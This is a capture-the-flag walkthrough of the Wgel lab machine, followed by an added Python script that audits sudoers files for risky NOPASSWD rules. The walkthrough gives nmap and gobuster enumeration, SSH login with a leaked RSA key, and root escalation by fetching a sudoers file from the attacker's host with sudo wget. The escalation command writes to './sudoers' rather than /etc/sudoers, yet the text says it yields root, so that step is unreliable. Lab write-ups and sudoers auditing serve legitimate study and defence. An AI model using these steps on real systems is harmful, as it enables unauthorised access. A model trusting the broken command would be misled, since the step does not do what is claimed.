Wgel CTF: Walkthrough

Aditya Jha
Sep 9, 2023

This is a very easy machine: we get into it through SSH and then escalate our privileges to get the root flag.

Our very first step is to run an Nmap scan.

Command: nmap -T5 -p- -A <target IP>

The results show 2 open ports: SSH and HTTP.

I have filtered the nmap scan in this screenshot.

Now we will check port 80.

There is an Apache web page.

If we check its source code, we can see something interesting.

Here is a name, “Jessie”.

Now we will do directory busting with the help of gobuster.

Command: gobuster dir -u <target url> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Now we have found something interesting: a directory that hosts a website.

Now we will do directory busting on this directory as well.

Command: gobuster dir -u <target url/sitemap> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Now we have found a directory named .ssh.

If we go to this directory, we can see that there is an RSA key.

We can use this key to log in to the machine through SSH.

Earlier we found the name “Jessie”.

Let’s log in with this username and the RSA key.

We have to restrict the permissions on the RSA key file so that only its owner can read it; otherwise ssh refuses to use the key.

Command: chmod 400 <file name>

Now we will log in through SSH.

Command: ssh -i <rsa file> jessie@<target IP>

We have successfully logged in to the machine.

We can get the user flag inside the “Documents” directory.

PRIVILEGE ESCALATION:

Now we will escalate our privileges to root so that we can get the root flag.

If we list the privileges for the invoking user

Command: sudo -l

then we can see that we can run “wget” as root without a password.

We will use this to escalate to the root user.

We have to create a sudoers file and get it onto the target machine so that Jessie can run commands as root.

Create a file and store the following:

jessie ALL=(ALL) NOPASSWD:ALL

Now we will host this file with the help of a Python server.

Command: python -m http.server 80

Now we will run wget on the target machine to fetch the new sudoers file.

Command: sudo /usr/bin/wget http://<your IP>:80/sudoers -O sudoers

Now if we use

Command: sudo ls /root

it will list the files in the /root directory.

Now we can use

Command: sudo cat /root/root_flag.txt

And we have finally got the ROOT FLAG…
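
On the defensive side, both the wget rule that `sudo -l` revealed and the replacement rule used above can be caught by auditing sudoers for NOPASSWD entries. The following is an added example, not part of the original walkthrough: the sample sudoers text is constructed, the name audit_sudoers is hypothetical, and the parser handles only plain user rules (no aliases or include files).

```python
import re

# Binaries that can write fetched content to any path when run as root.
# Only wget comes from this walkthrough; extend the set for your own estate.
FILE_WRITERS = {"wget"}

# Constructed sample (not copied from the target): a wget rule like the one
# `sudo -l` revealed, the replacement rule from the walkthrough, and two
# ordinary rules for contrast.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
jessie  ALL=(root) NOPASSWD: /usr/bin/wget
jessie ALL=(ALL) NOPASSWD:ALL
backup  ALL=(root) NOPASSWD: /usr/bin/systemctl restart \\
        backup.service
"""

RULE = re.compile(r"^(?P<who>\S+)\s+[^=\s]+\s*=\s*(?P<spec>.+)$")
TAG = re.compile(r"^([A-Z_]+)\s*:\s*")
RUNAS = re.compile(r"^\([^)]*\)\s*")


def audit_sudoers(text):
    """Return (user, command, reason) per risky NOPASSWD command (simple user rules only)."""
    findings = []
    text = re.sub(r"\\\n\s*", " ", text)  # join backslash-continued lines
    for line in map(str.strip, text.splitlines()):
        rule = RULE.match(line)
        if not rule or line.startswith(("#", "Defaults")):
            continue
        nopasswd = False  # a tag stays in force for the rest of the rule
        for cmd in map(str.strip, rule["spec"].split(",")):
            cmd = RUNAS.sub("", cmd)  # drop a leading (runas) specification
            while (tag := TAG.match(cmd)):
                nopasswd = {"NOPASSWD": True, "PASSWD": False}.get(tag[1], nopasswd)
                cmd = cmd[tag.end():]
            if not nopasswd or not cmd:
                continue
            if cmd == "ALL":
                findings.append((rule["who"], cmd, "any command as root, no password"))
            elif cmd.split()[0].rsplit("/", 1)[-1] in FILE_WRITERS:
                findings.append((rule["who"], cmd, "can overwrite files such as sudoers"))
    return findings


if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print(finding)
```

Run against the constructed sample, it reports both jessie rules and leaves the root and backup rules alone.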
